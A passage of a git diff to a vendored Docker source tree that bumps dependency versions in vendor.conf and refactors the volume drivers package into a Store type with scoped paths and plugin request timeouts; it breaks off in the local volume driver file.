2beffdc2e92c8a3027590f898fe88f69af48a3f8 https://github.com/tonistiigi/net.git -golang.org/x/sys 8f0908ab3b2457e2e15403d3697c9ef5cb4b57a9 -github.com/docker/go-units 8a7beacffa3009a9ac66bad506b18ffdd110cf97 -github.com/docker/go-connections ecb4cb2dd420ada7df7f2593d6c25441f65f69f2 +golang.org/x/net 0ed95abb35c445290478a5348a7b38bb154135fd +golang.org/x/sys 37707fdb30a5b38865cfb95e5aab41707daec7fd +github.com/docker/go-units 9e638d38cf6977a37a8ea0078f3ee75a7cdb2dd1 +github.com/docker/go-connections 7beb39f0b969b075d1325fecb092faf27fd357b6 +golang.org/x/text f72d8390a633d5dfb0cc84043294db9f6c935756 +gotest.tools v2.1.0 +github.com/google/go-cmp v0.2.0 github.com/RackSec/srslog 456df3a81436d29ba874f3590eeeee25d666f8a5 -github.com/imdario/mergo 0.2.1 +github.com/imdario/mergo v0.3.5 +golang.org/x/sync fd80eb99c8f653c847d294a001bdf2a3a6f768f5 + +# buildkit +github.com/moby/buildkit dbf67a691ce77023a0a5ce9b005298631f8bbb4e +github.com/tonistiigi/fsutil 8abad97ee3969cdf5e9c367f46adba2c212b3ddb +github.com/grpc-ecosystem/grpc-opentracing 8e809c8a86450a29b90dcc9efbf062d0fe6d9746 +github.com/opentracing/opentracing-go 1361b9cd60be79c4c3a7fa9841b3c132e40066a7 +github.com/google/shlex 6f45313302b9c56850fc17f99e40caebce98c716 +github.com/opentracing-contrib/go-stdlib b1a47cfbdd7543e70e9ef3e73d0802ad306cc1cc +github.com/mitchellh/hashstructure 2bca23e0e452137f789efbc8610126fd8b94f73b #get libnetwork packages -github.com/docker/libnetwork 45b40861e677e37cf27bc184eca5af92f8cdd32d -github.com/docker/go-events 18b43f1bc85d9cdd42c05a6cd2d444c7a200a894 + +# When updating, also update LIBNETWORK_COMMIT in hack/dockerfile/install/proxy accordingly +github.com/docker/libnetwork 19279f0492417475b6bfbd0aa529f73e8f178fb5 +github.com/docker/go-events 9461782956ad83b30282bf90e31fa6a70c255ba9 github.com/armon/go-radix e39d623f12e8e41c7b5529e9a9dd67a1e2261f80 github.com/armon/go-metrics eb0af217e5e9747e41dd5303755356b62d28e3ec github.com/hashicorp/go-msgpack 
71c2886f5a673a35f909803f38ece5810165097b -github.com/hashicorp/memberlist 88ac4de0d1a0ca6def284b571342db3b777a4c37 +github.com/hashicorp/memberlist 3d8438da9589e7b608a83ffac1ef8211486bcb7c +github.com/sean-/seed e2103e2c35297fb7e17febb81e49b312087a2372 +github.com/hashicorp/go-sockaddr acd314c5781ea706c710d9ea70069fd2e110d61d github.com/hashicorp/go-multierror fcdddc395df1ddf4247c69bd436e84cfa0733f7e github.com/hashicorp/serf 598c54895cc5a7b1a24a398d635e8c0ea0959870 github.com/docker/libkv 1d8431073ae03cdaedb198a89722f3aab6d418ef github.com/vishvananda/netns 604eaf189ee867d8c147fafc28def2394e878d25 -github.com/vishvananda/netlink 482f7a52b758233521878cb6c5904b6bd63f3457 -github.com/BurntSushi/toml f706d00e3de6abe700c994cdd545a1a4915af060 +github.com/vishvananda/netlink b2de5d10e38ecce8607e6b438b6d174f389a004e + +# When updating, consider updating TOMLV_COMMIT in hack/dockerfile/install/tomlv accordingly +github.com/BurntSushi/toml a368813c5e648fee92e5f6c30e3944ff9d5e8895 github.com/samuel/go-zookeeper d0e0d8e11f318e000a8cc434616d69e329edc374 github.com/deckarep/golang-set ef32fa3046d9f249d399f98ebaf9be944430fd1d -github.com/coreos/etcd 3a49cbb769ebd8d1dd25abb1e83386e9883a5707 +github.com/coreos/etcd v3.2.1 +github.com/coreos/go-semver v0.2.0 github.com/ugorji/go f1f1a805ed361a0e078bb537e4ea78cd37dcf065 github.com/hashicorp/consul v0.5.2 github.com/boltdb/bolt fff57c100f4dea1905678da7e90d92429dff2904 -github.com/miekg/dns 75e6e86cc601825c5dbcd4e0c209eab180997cd7 +github.com/miekg/dns v1.0.7 +github.com/ishidawataru/sctp 07191f837fedd2f13d1ec7b5f885f0f3ec54b1cb # get graph and distribution packages -github.com/docker/distribution 28602af35aceda2f8d571bad7ca37a54cf0250bc -github.com/vbatts/tar-split v0.10.1 +github.com/docker/distribution 83389a148052d74ac602f5f1d62f86ff2f3c4aa5 +github.com/vbatts/tar-split v0.10.2 +github.com/opencontainers/go-digest v1.0.0-rc1 # get go-zfs packages github.com/mistifyio/go-zfs 22c9b32c84eb0d0c6f4043b6e90fc94073de92fa 
github.com/pborman/uuid v1.0 -# get desired notary commit, might also need to be updated in Dockerfile -github.com/docker/notary v0.4.2 +google.golang.org/grpc v1.12.0 -google.golang.org/grpc v1.0.2 -github.com/miekg/pkcs11 df8ae6ca730422dba20c768ff38ef7d79077a59f -github.com/docker/go v1.5.1-1-1-gbaf439e -github.com/agl/ed25519 d2b94fd789ea21d12fac1a4443dd3a3f79cda72c - -# When updating, also update RUNC_COMMIT in hack/dockerfile/binaries-commits accordingly -github.com/opencontainers/runc 9df8b306d01f59d3a8029be411de015b7304dd8f https://github.com/docker/runc.git # libcontainer -github.com/opencontainers/runtime-spec 1c7c27d043c2a5e513a44084d2b10d77d1402b8c # specs +# This does not need to match RUNC_COMMIT as it is used for helper packages but should be newer or equal +github.com/opencontainers/runc ad0f5255060d36872be04de22f8731f38ef2d7b1 +github.com/opencontainers/runtime-spec v1.0.1 +github.com/opencontainers/image-spec v1.0.1 github.com/seccomp/libseccomp-golang 32f571b70023028bd57d9288c20efbcb237f3ce0 + # libcontainer deps (see src/github.com/opencontainers/runc/Godeps/Godeps.json) -github.com/coreos/go-systemd v4 +github.com/coreos/go-systemd v17 github.com/godbus/dbus v4.0.0 github.com/syndtr/gocapability 2c00daeb6c3b45114c80ac44119e7b8801fdd852 -github.com/golang/protobuf 1f49d83d9aa00e6ce4fc8258c71cc7786aec968a +github.com/golang/protobuf v1.1.0 # gelf logging driver deps -github.com/Graylog2/go-gelf aab2f594e4585d43468ac57287b0dece9d806883 +github.com/Graylog2/go-gelf 4143646226541087117ff2f83334ea48b3201841 -github.com/fluent/fluent-logger-golang v1.2.1 +github.com/fluent/fluent-logger-golang v1.3.0 # fluent-logger-golang deps -github.com/philhofer/fwd 899e4efba8eaa1fea74175308f3fae18ff3319fa -github.com/tinylib/msgp 75ee40d2601edf122ef667e2a07d600d4c44490c +github.com/philhofer/fwd 98c11a7a6ec829d672b03833c3d69a7fae1ca972 +github.com/tinylib/msgp 3b556c64540842d4f82967be066a7f7fffc3adad # fsnotify -github.com/fsnotify/fsnotify v1.2.11 
+github.com/fsnotify/fsnotify 4da3e2cfbabc9f751898f250b49f2439785783a1 # awslogs deps -github.com/aws/aws-sdk-go v1.4.22 -github.com/go-ini/ini 060d7da055ba6ec5ea7a31f116332fe5efa04ce0 +github.com/aws/aws-sdk-go v1.12.66 +github.com/go-ini/ini v1.25.4 github.com/jmespath/go-jmespath 0b12d6b521d83fc7f755e7cfc1b1fbdd35a01a74 # logentries -github.com/bsphere/le_go d3308aafe090956bc89a65f0769f58251a1b4f03 +github.com/bsphere/le_go 7a984a84b5492ae539b79b62fb4a10afc63c7bcf # gcplogs deps -golang.org/x/oauth2 2baa8a1b9338cf13d9eeb27696d761155fa480be -google.golang.org/api dc6d2353af16e2a2b0ff6986af051d473a4ed468 -google.golang.org/cloud dae7e3d993bc3812a2185af60552bb6b847e52a0 - -# native credentials -github.com/docker/docker-credential-helpers f72c04f1d8e71959a6d103f808c50ccbad79b9fd +golang.org/x/oauth2 ec22f46f877b4505e0117eeaab541714644fdd28 +google.golang.org/api de943baf05a022a8f921b544b7827bacaba1aed5 +go.opencensus.io v0.11.0 +cloud.google.com/go v0.23.0 +github.com/googleapis/gax-go v2.0.0 +google.golang.org/genproto 694d95ba50e67b2e363f3483057db5d4910c18f9 # containerd -github.com/docker/containerd aa8187dbd3b7ad67d8e5e3a15115d3eef43a7ed1 -github.com/tonistiigi/fifo 1405643975692217d6720f8b54aeee1bf2cd5cf4 +github.com/containerd/containerd 63522d9eaa5a0443d225642c4b6f4f5fdedf932b +github.com/containerd/fifo 3d5202aec260678c48179c56f40e6f38a095738c +github.com/containerd/continuity d3c23511c1bf5851696cba83143d9cbcd666869b +github.com/containerd/cgroups fe281dd265766145e943a034aa41086474ea6130 +github.com/containerd/console 9290d21dc56074581f619579c43d970b4514bc08 +github.com/containerd/go-runc f271fa2021de855d4d918dbef83c5fe19db1bdd +github.com/containerd/typeurl f6943554a7e7e88b3c14aad190bf05932da84788 +github.com/stevvooe/ttrpc d4528379866b0ce7e9d71f3eb96f0582fc374577 +github.com/gogo/googleapis 08a7655d27152912db7aaf4f983275eaf8d128ef # cluster -github.com/docker/swarmkit 1c7f003d75f091d5f7051ed982594420e4515f77 -github.com/golang/mock 
bd3c8e81be01eef76d4b503f5e687d2d1354d2d9 -github.com/gogo/protobuf v0.3 +github.com/docker/swarmkit edd5641391926a50bc5f7040e20b7efc05003c26 +github.com/gogo/protobuf v1.0.0 github.com/cloudflare/cfssl 7fb22c8cba7ecaf98e4082d22d65800cf45e042a +github.com/fernet/fernet-go 1b2437bc582b3cfbb341ee5a29f8ef5b42912ff2 github.com/google/certificate-transparency d90e65c3a07988180c5b1ece71791c0b6506826e -golang.org/x/crypto 3fbbcd23f1cb824e69491a5930cfeff09b12f4d2 +golang.org/x/crypto 1a580b3eff7814fc9b40602fd35256c63b50f491 golang.org/x/time a4bde12657593d5e90d0533a3e4fd95e635124cb -github.com/mreiferson/go-httpclient 63fe23f7434723dc904c901043af07931f293c47 -github.com/hashicorp/go-memdb 608dda3b1410a73eaf3ac8b517c9ae7ebab6aa87 -github.com/hashicorp/go-immutable-radix 8e8ed81f8f0bf1bdd829593fdd5c29922c1ea990 +github.com/hashicorp/go-memdb cb9a474f84cc5e41b273b20c6927680b2a8776ad +github.com/hashicorp/go-immutable-radix 826af9ccf0feeee615d546d69b11f8e98da8c8f1 git://github.com/tonistiigi/go-immutable-radix.git github.com/hashicorp/golang-lru a0d98a5f288019575c6d1f4bb1573fef2d1fcdc4 github.com/coreos/pkg fa29b1d70f0beaddd4c7021607cc3c3be8ce94b8 github.com/pivotal-golang/clock 3fd3c1944c59d9742e1cd333672181cd1a6f9fa0 @@ -119,22 +142,23 @@ github.com/beorn7/perks 4c0e84591b9aa9e6dcfdf3e020114cd81f89d5f9 github.com/prometheus/client_model fa8ad6fec33561be4280a8f0514318c79d7f6cb6 github.com/prometheus/common ebdfc6da46522d58825777cf1f90490a5b1ef1d8 github.com/prometheus/procfs abf152e5f3e97f2fafac028d2cc06c1feb87ffa5 -bitbucket.org/ww/goautoneg 75cd24fc2f2c2a2088577d12123ddee5f54e0675 -github.com/matttproud/golang_protobuf_extensions fc2b8d3a73c4867e51861bbdd5ae3c1f0869dd6a +github.com/matttproud/golang_protobuf_extensions v1.0.0 github.com/pkg/errors 839d9e913e063e28dfd0e6c7b7512793e0a48be9 +github.com/grpc-ecosystem/go-grpc-prometheus 6b7015e65d366bf3f19b2b2a000a831940f0f7e0 # cli -github.com/spf13/cobra v1.5 https://github.com/dnephin/cobra.git -github.com/spf13/pflag 
dabebe21bf790f782ea4c7bbd2efc430de182afd +github.com/spf13/cobra v0.0.3 +github.com/spf13/pflag v1.0.1 github.com/inconshreveable/mousetrap 76626ae9c91c4f2a10f34cad8ce83ea42c93bb75 -github.com/flynn-archive/go-shlex 3f9db97f856818214da2e1057f8ad84803971cff +github.com/Nvveen/Gotty a8b993ba6abdb0e0c12b0125c603323a71c7790c https://github.com/ijc25/Gotty # metrics -github.com/docker/go-metrics 86138d05f285fd9737a99bee2d9be30866b59d72 - -# composefile -github.com/mitchellh/mapstructure f3009df150dadf309fdee4a54ed65c124afad715 -github.com/xeipuuv/gojsonpointer e0fe6f68307607d540ed8eac07a342c33fa1b54a -github.com/xeipuuv/gojsonreference e02fc20de94c78484cd5ffb007f8af96be030a45 -github.com/xeipuuv/gojsonschema 93e72a773fade158921402d6a24c819b48aba29d -gopkg.in/yaml.v2 a83829b6f1293c91addabc89d0571c246397bbf4 +github.com/docker/go-metrics d466d4f6fd960e01820085bd7e1a24426ee7ef18 + +github.com/opencontainers/selinux b29023b86e4a69d1b46b7e7b4e2b6fda03f0b9cd + + +# archive/tar (for Go 1.10, see https://github.com/golang/go/issues/24787) +# mkdir -p ./vendor/archive +# git clone -b go-1.10 --depth=1 git@github.com:kolyshkin/go-tar.git ./vendor/archive/tar +# vndr # to clean up test files diff --git a/vendor/github.com/docker/docker/volume/drivers/adapter.go b/vendor/github.com/docker/docker/volume/drivers/adapter.go index 62ef7dfe60..f6ee07a006 100644 --- a/vendor/github.com/docker/docker/volume/drivers/adapter.go +++ b/vendor/github.com/docker/docker/volume/drivers/adapter.go @@ -1,12 +1,12 @@ -package volumedrivers +package drivers // import "github.com/docker/docker/volume/drivers" import ( "errors" - "path/filepath" "strings" + "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/volume" + "github.com/sirupsen/logrus" ) var ( @@ -15,9 +15,9 @@ var ( type volumeDriverAdapter struct { name string - baseHostPath string + scopePath func(s string) string capabilities *volume.Capability - proxy *volumeDriverProxy + proxy volumeDriver } func (a *volumeDriverAdapter) 
Name() string { @@ -29,10 +29,10 @@ func (a *volumeDriverAdapter) Create(name string, opts map[string]string) (volum return nil, err } return &volumeAdapter{ - proxy: a.proxy, - name: name, - driverName: a.name, - baseHostPath: a.baseHostPath, + proxy: a.proxy, + name: name, + driverName: a.name, + scopePath: a.scopePath, }, nil } @@ -40,13 +40,6 @@ func (a *volumeDriverAdapter) Remove(v volume.Volume) error { return a.proxy.Remove(v.Name()) } -func hostPath(baseHostPath, path string) string { - if baseHostPath != "" { - path = filepath.Join(baseHostPath, path) - } - return path -} - func (a *volumeDriverAdapter) List() ([]volume.Volume, error) { ls, err := a.proxy.List() if err != nil { @@ -56,11 +49,11 @@ func (a *volumeDriverAdapter) List() ([]volume.Volume, error) { var out []volume.Volume for _, vp := range ls { out = append(out, &volumeAdapter{ - proxy: a.proxy, - name: vp.Name, - baseHostPath: a.baseHostPath, - driverName: a.name, - eMount: hostPath(a.baseHostPath, vp.Mountpoint), + proxy: a.proxy, + name: vp.Name, + scopePath: a.scopePath, + driverName: a.name, + eMount: a.scopePath(vp.Mountpoint), }) } return out, nil @@ -78,12 +71,13 @@ func (a *volumeDriverAdapter) Get(name string) (volume.Volume, error) { } return &volumeAdapter{ - proxy: a.proxy, - name: v.Name, - driverName: a.Name(), - eMount: v.Mountpoint, - status: v.Status, - baseHostPath: a.baseHostPath, + proxy: a.proxy, + name: v.Name, + driverName: a.Name(), + eMount: v.Mountpoint, + createdAt: v.CreatedAt, + status: v.Status, + scopePath: a.scopePath, }, nil } @@ -100,7 +94,7 @@ func (a *volumeDriverAdapter) getCapabilities() volume.Capability { if err != nil { // `GetCapabilities` is a not a required endpoint. 
// On error assume it's a local-only driver - logrus.Warnf("Volume driver %s returned an error while trying to query its capabilities, using default capabilties: %v", a.name, err) + logrus.WithError(err).WithField("driver", a.name).Debug("Volume driver returned an error while trying to query its capabilities, using default capabilities") return volume.Capability{Scope: volume.LocalScope} } @@ -111,7 +105,7 @@ func (a *volumeDriverAdapter) getCapabilities() volume.Capability { cap.Scope = strings.ToLower(cap.Scope) if cap.Scope != volume.LocalScope && cap.Scope != volume.GlobalScope { - logrus.Warnf("Volume driver %q returned an invalid scope: %q", a.Name(), cap.Scope) + logrus.WithField("driver", a.Name()).WithField("scope", a.Scope).Warn("Volume driver returned an invalid scope") cap.Scope = volume.LocalScope } @@ -120,17 +114,19 @@ func (a *volumeDriverAdapter) getCapabilities() volume.Capability { } type volumeAdapter struct { - proxy *volumeDriverProxy - name string - baseHostPath string - driverName string - eMount string // ephemeral host volume path - status map[string]interface{} + proxy volumeDriver + name string + scopePath func(string) string + driverName string + eMount string // ephemeral host volume path + createdAt time.Time // time the directory was created + status map[string]interface{} } type proxyVolume struct { Name string Mountpoint string + CreatedAt time.Time Status map[string]interface{} } @@ -145,7 +141,7 @@ func (a *volumeAdapter) DriverName() string { func (a *volumeAdapter) Path() string { if len(a.eMount) == 0 { mountpoint, _ := a.proxy.Path(a.name) - a.eMount = hostPath(a.baseHostPath, mountpoint) + a.eMount = a.scopePath(mountpoint) } return a.eMount } @@ -156,7 +152,7 @@ func (a *volumeAdapter) CachedPath() string { func (a *volumeAdapter) Mount(id string) (string, error) { mountpoint, err := a.proxy.Mount(a.name, id) - a.eMount = hostPath(a.baseHostPath, mountpoint) + a.eMount = a.scopePath(mountpoint) return a.eMount, err } @@ 
-168,6 +164,9 @@ func (a *volumeAdapter) Unmount(id string) error { return err } +func (a *volumeAdapter) CreatedAt() (time.Time, error) { + return a.createdAt, nil +} func (a *volumeAdapter) Status() map[string]interface{} { out := make(map[string]interface{}, len(a.status)) for k, v := range a.status { diff --git a/vendor/github.com/docker/docker/volume/drivers/extpoint.go b/vendor/github.com/docker/docker/volume/drivers/extpoint.go index 576dee8a1b..b2131c20ef 100644 --- a/vendor/github.com/docker/docker/volume/drivers/extpoint.go +++ b/vendor/github.com/docker/docker/volume/drivers/extpoint.go @@ -1,35 +1,27 @@ //go:generate pluginrpc-gen -i $GOFILE -o proxy.go -type volumeDriver -name VolumeDriver -package volumedrivers +package drivers // import "github.com/docker/docker/volume/drivers" import ( "fmt" + "sort" "sync" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/locker" getter "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" "github.com/docker/docker/volume" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) -// currently created by hand. generation tool would generate this like: -// $ extpoint-gen Driver > volume/extpoint.go - -var drivers = &driverExtpoint{ - extensions: make(map[string]volume.Driver), - driverLock: &locker.Locker{}, -} - const extName = "VolumeDriver" -// NewVolumeDriver returns a driver has the given name mapped on the given client. -func NewVolumeDriver(name string, baseHostPath string, c client) volume.Driver { - proxy := &volumeDriverProxy{c} - return &volumeDriverAdapter{name: name, baseHostPath: baseHostPath, proxy: proxy} -} - // volumeDriver defines the available functions that volume plugins must implement. // This interface is only defined to generate the proxy objects. // It's not intended to be public or reused. 
+// nolint: deadcode type volumeDriver interface { // Create a volume with the given name Create(name string, opts map[string]string) (err error) @@ -49,87 +41,75 @@ type volumeDriver interface { Capabilities() (capabilities volume.Capability, err error) } -type driverExtpoint struct { - extensions map[string]volume.Driver - sync.Mutex +// Store is an in-memory store for volume drivers +type Store struct { + extensions map[string]volume.Driver + mu sync.Mutex driverLock *locker.Locker - plugingetter getter.PluginGetter -} - -// RegisterPluginGetter sets the plugingetter -func RegisterPluginGetter(plugingetter getter.PluginGetter) { - drivers.plugingetter = plugingetter + pluginGetter getter.PluginGetter } -// Register associates the given driver to the given name, checking if -// the name is already associated -func Register(extension volume.Driver, name string) bool { - if name == "" { - return false - } - - drivers.Lock() - defer drivers.Unlock() - - _, exists := drivers.extensions[name] - if exists { - return false - } - - if err := validateDriver(extension); err != nil { - return false +// NewStore creates a new volume driver store +func NewStore(pg getter.PluginGetter) *Store { + return &Store{ + extensions: make(map[string]volume.Driver), + driverLock: locker.New(), + pluginGetter: pg, } - - drivers.extensions[name] = extension - - return true } -// Unregister dissociates the name from its driver, if the association exists. -func Unregister(name string) bool { - drivers.Lock() - defer drivers.Unlock() +type driverNotFoundError string - _, exists := drivers.extensions[name] - if !exists { - return false - } - delete(drivers.extensions, name) - return true +func (e driverNotFoundError) Error() string { + return "volume driver not found: " + string(e) } +func (driverNotFoundError) NotFound() {} + // lookup returns the driver associated with the given name. 
If a // driver with the given name has not been registered it checks if // there is a VolumeDriver plugin available with the given name. -func lookup(name string, mode int) (volume.Driver, error) { - drivers.driverLock.Lock(name) - defer drivers.driverLock.Unlock(name) +func (s *Store) lookup(name string, mode int) (volume.Driver, error) { + if name == "" { + return nil, errdefs.InvalidParameter(errors.New("driver name cannot be empty")) + } + s.driverLock.Lock(name) + defer s.driverLock.Unlock(name) - drivers.Lock() - ext, ok := drivers.extensions[name] - drivers.Unlock() + s.mu.Lock() + ext, ok := s.extensions[name] + s.mu.Unlock() if ok { return ext, nil } - if drivers.plugingetter != nil { - p, err := drivers.plugingetter.Get(name, extName, mode) + if s.pluginGetter != nil { + p, err := s.pluginGetter.Get(name, extName, mode) if err != nil { - return nil, fmt.Errorf("Error looking up volume plugin %s: %v", name, err) + return nil, errors.Wrap(err, "error looking up volume plugin "+name) } - d := NewVolumeDriver(p.Name(), p.BasePath(), p.Client()) + d, err := makePluginAdapter(p) + if err != nil { + return nil, errors.Wrap(err, "error making plugin client") + } if err := validateDriver(d); err != nil { + if mode > 0 { + // Undo any reference count changes from the initial `Get` + if _, err := s.pluginGetter.Get(name, extName, mode*-1); err != nil { + logrus.WithError(err).WithField("action", "validate-driver").WithField("plugin", name).Error("error releasing reference to plugin") + } + } return nil, err } if p.IsV1() { - drivers.Lock() - drivers.extensions[name] = d - drivers.Unlock() + s.mu.Lock() + s.extensions[name] = d + s.mu.Unlock() } return d, nil } - return nil, fmt.Errorf("Error looking up volume plugin %s", name) + return nil, driverNotFoundError(name) } func validateDriver(vd volume.Driver) error { @@ -140,76 +120,116 @@ func validateDriver(vd volume.Driver) error { return nil } -// GetDriver returns a volume driver by its name. 
-// If the driver is empty, it looks for the local driver. -func GetDriver(name string) (volume.Driver, error) { +// Register associates the given driver to the given name, checking if +// the name is already associated +func (s *Store) Register(d volume.Driver, name string) bool { if name == "" { - name = volume.DefaultDriverName + return false + } + + s.mu.Lock() + defer s.mu.Unlock() + + if _, exists := s.extensions[name]; exists { + return false + } + + if err := validateDriver(d); err != nil { + return false } - return lookup(name, getter.LOOKUP) + + s.extensions[name] = d + return true +} + +// GetDriver returns a volume driver by its name. +// If the driver is empty, it looks for the local driver. +func (s *Store) GetDriver(name string) (volume.Driver, error) { + return s.lookup(name, getter.Lookup) } // CreateDriver returns a volume driver by its name and increments RefCount. // If the driver is empty, it looks for the local driver. -func CreateDriver(name string) (volume.Driver, error) { - if name == "" { - name = volume.DefaultDriverName - } - return lookup(name, getter.ACQUIRE) +func (s *Store) CreateDriver(name string) (volume.Driver, error) { + return s.lookup(name, getter.Acquire) } -// RemoveDriver returns a volume driver by its name and decrements RefCount.. +// ReleaseDriver returns a volume driver by its name and decrements RefCount.. // If the driver is empty, it looks for the local driver. -func RemoveDriver(name string) (volume.Driver, error) { - if name == "" { - name = volume.DefaultDriverName - } - return lookup(name, getter.RELEASE) +func (s *Store) ReleaseDriver(name string) (volume.Driver, error) { + return s.lookup(name, getter.Release) } // GetDriverList returns list of volume drivers registered. // If no driver is registered, empty string list will be returned. 
-func GetDriverList() []string { +func (s *Store) GetDriverList() []string { var driverList []string - drivers.Lock() - for driverName := range drivers.extensions { + s.mu.Lock() + defer s.mu.Unlock() + for driverName := range s.extensions { driverList = append(driverList, driverName) } - drivers.Unlock() + sort.Strings(driverList) return driverList } // GetAllDrivers lists all the registered drivers -func GetAllDrivers() ([]volume.Driver, error) { +func (s *Store) GetAllDrivers() ([]volume.Driver, error) { var plugins []getter.CompatPlugin - if drivers.plugingetter != nil { + if s.pluginGetter != nil { var err error - plugins, err = drivers.plugingetter.GetAllByCap(extName) + plugins, err = s.pluginGetter.GetAllByCap(extName) if err != nil { return nil, fmt.Errorf("error listing plugins: %v", err) } } var ds []volume.Driver - drivers.Lock() - defer drivers.Unlock() + s.mu.Lock() + defer s.mu.Unlock() - for _, d := range drivers.extensions { + for _, d := range s.extensions { ds = append(ds, d) } for _, p := range plugins { name := p.Name() - ext, ok := drivers.extensions[name] - if ok { + + if _, ok := s.extensions[name]; ok { continue } - ext = NewVolumeDriver(name, p.BasePath(), p.Client()) + ext, err := makePluginAdapter(p) + if err != nil { + return nil, errors.Wrap(err, "error making plugin client") + } if p.IsV1() { - drivers.extensions[name] = ext + s.extensions[name] = ext } ds = append(ds, ext) } return ds, nil } + +func makePluginAdapter(p getter.CompatPlugin) (*volumeDriverAdapter, error) { + if pc, ok := p.(getter.PluginWithV1Client); ok { + return &volumeDriverAdapter{name: p.Name(), scopePath: p.ScopedPath, proxy: &volumeDriverProxy{pc.Client()}}, nil + } + + pa, ok := p.(getter.PluginAddr) + if !ok { + return nil, errdefs.System(errors.Errorf("got unknown plugin instance %T", p)) + } + + if pa.Protocol() != plugins.ProtocolSchemeHTTPV1 { + return nil, errors.Errorf("plugin protocol not supported: %s", p) + } + + addr := pa.Addr() + client, err := 
plugins.NewClientWithTimeout(addr.Network()+"://"+addr.String(), nil, pa.Timeout()) + if err != nil { + return nil, errors.Wrap(err, "error creating plugin client") + } + + return &volumeDriverAdapter{name: p.Name(), scopePath: p.ScopedPath, proxy: &volumeDriverProxy{client}}, nil +} diff --git a/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go b/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go index 428b0752f2..384742ea00 100644 --- a/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go +++ b/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go @@ -1,4 +1,4 @@ -package volumedrivers +package drivers // import "github.com/docker/docker/volume/drivers" import ( "testing" @@ -7,13 +7,14 @@ import ( ) func TestGetDriver(t *testing.T) { - _, err := GetDriver("missing") + s := NewStore(nil) + _, err := s.GetDriver("missing") if err == nil { t.Fatal("Expected error, was nil") } - Register(volumetestutils.NewFakeDriver("fake"), "fake") + s.Register(volumetestutils.NewFakeDriver("fake"), "fake") - d, err := GetDriver("fake") + d, err := s.GetDriver("fake") if err != nil { t.Fatal(err) } diff --git a/vendor/github.com/docker/docker/volume/drivers/proxy.go b/vendor/github.com/docker/docker/volume/drivers/proxy.go index b23db6258f..8a44faeddc 100644 --- a/vendor/github.com/docker/docker/volume/drivers/proxy.go +++ b/vendor/github.com/docker/docker/volume/drivers/proxy.go @@ -1,15 +1,22 @@ // generated code - DO NOT EDIT -package volumedrivers +package drivers // import "github.com/docker/docker/volume/drivers" import ( "errors" + "time" + "github.com/docker/docker/pkg/plugins" "github.com/docker/docker/volume" ) +const ( + longTimeout = 2 * time.Minute + shortTimeout = 1 * time.Minute +) + type client interface { - Call(string, interface{}, interface{}) error + CallWithOptions(string, interface{}, interface{}, ...func(*plugins.RequestOpts)) error } type volumeDriverProxy struct { @@ -33,7 +40,8 @@ func (pp 
*volumeDriverProxy) Create(name string, opts map[string]string) (err er req.Name = name req.Opts = opts - if err = pp.Call("VolumeDriver.Create", req, &ret); err != nil { + + if err = pp.CallWithOptions("VolumeDriver.Create", req, &ret, plugins.WithRequestTimeout(longTimeout)); err != nil { return } @@ -59,7 +67,8 @@ func (pp *volumeDriverProxy) Remove(name string) (err error) { ) req.Name = name - if err = pp.Call("VolumeDriver.Remove", req, &ret); err != nil { + + if err = pp.CallWithOptions("VolumeDriver.Remove", req, &ret, plugins.WithRequestTimeout(shortTimeout)); err != nil { return } @@ -86,7 +95,8 @@ func (pp *volumeDriverProxy) Path(name string) (mountpoint string, err error) { ) req.Name = name - if err = pp.Call("VolumeDriver.Path", req, &ret); err != nil { + + if err = pp.CallWithOptions("VolumeDriver.Path", req, &ret, plugins.WithRequestTimeout(shortTimeout)); err != nil { return } @@ -117,7 +127,8 @@ func (pp *volumeDriverProxy) Mount(name string, id string) (mountpoint string, e req.Name = name req.ID = id - if err = pp.Call("VolumeDriver.Mount", req, &ret); err != nil { + + if err = pp.CallWithOptions("VolumeDriver.Mount", req, &ret, plugins.WithRequestTimeout(longTimeout)); err != nil { return } @@ -147,7 +158,8 @@ func (pp *volumeDriverProxy) Unmount(name string, id string) (err error) { req.Name = name req.ID = id - if err = pp.Call("VolumeDriver.Unmount", req, &ret); err != nil { + + if err = pp.CallWithOptions("VolumeDriver.Unmount", req, &ret, plugins.WithRequestTimeout(shortTimeout)); err != nil { return } @@ -172,7 +184,7 @@ func (pp *volumeDriverProxy) List() (volumes []*proxyVolume, err error) { ret volumeDriverProxyListResponse ) - if err = pp.Call("VolumeDriver.List", req, &ret); err != nil { + if err = pp.CallWithOptions("VolumeDriver.List", req, &ret, plugins.WithRequestTimeout(shortTimeout)); err != nil { return } @@ -201,7 +213,8 @@ func (pp *volumeDriverProxy) Get(name string) (volume *proxyVolume, err error) { ) req.Name = name - 
if err = pp.Call("VolumeDriver.Get", req, &ret); err != nil { + + if err = pp.CallWithOptions("VolumeDriver.Get", req, &ret, plugins.WithRequestTimeout(shortTimeout)); err != nil { return } @@ -228,7 +241,7 @@ func (pp *volumeDriverProxy) Capabilities() (capabilities volume.Capability, err ret volumeDriverProxyCapabilitiesResponse ) - if err = pp.Call("VolumeDriver.Capabilities", req, &ret); err != nil { + if err = pp.CallWithOptions("VolumeDriver.Capabilities", req, &ret, plugins.WithRequestTimeout(shortTimeout)); err != nil { return } diff --git a/vendor/github.com/docker/docker/volume/drivers/proxy_test.go b/vendor/github.com/docker/docker/volume/drivers/proxy_test.go index b78c46a036..79af956333 100644 --- a/vendor/github.com/docker/docker/volume/drivers/proxy_test.go +++ b/vendor/github.com/docker/docker/volume/drivers/proxy_test.go @@ -1,4 +1,4 @@ -package volumedrivers +package drivers // import "github.com/docker/docker/volume/drivers" import ( "fmt" diff --git a/vendor/github.com/docker/docker/volume/local/local.go b/vendor/github.com/docker/docker/volume/local/local.go index 62c45e69ea..d97347423a 100644 --- a/vendor/github.com/docker/docker/volume/local/local.go +++ b/vendor/github.com/docker/docker/volume/local/local.go @@ -1,7 +1,7 @@ // Package local provides the default implementation for volumes. It // is used to mount data volume containers and directories local to // the host server. -package local +package local // import "github.com/docker/docker/volume/local" import ( "encoding/json" @@ -13,13 +13,12 @@ import ( "strings" "sync" - "github.com/pkg/errors" - - "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/names" + "github.com/docker/docker/errdefs" 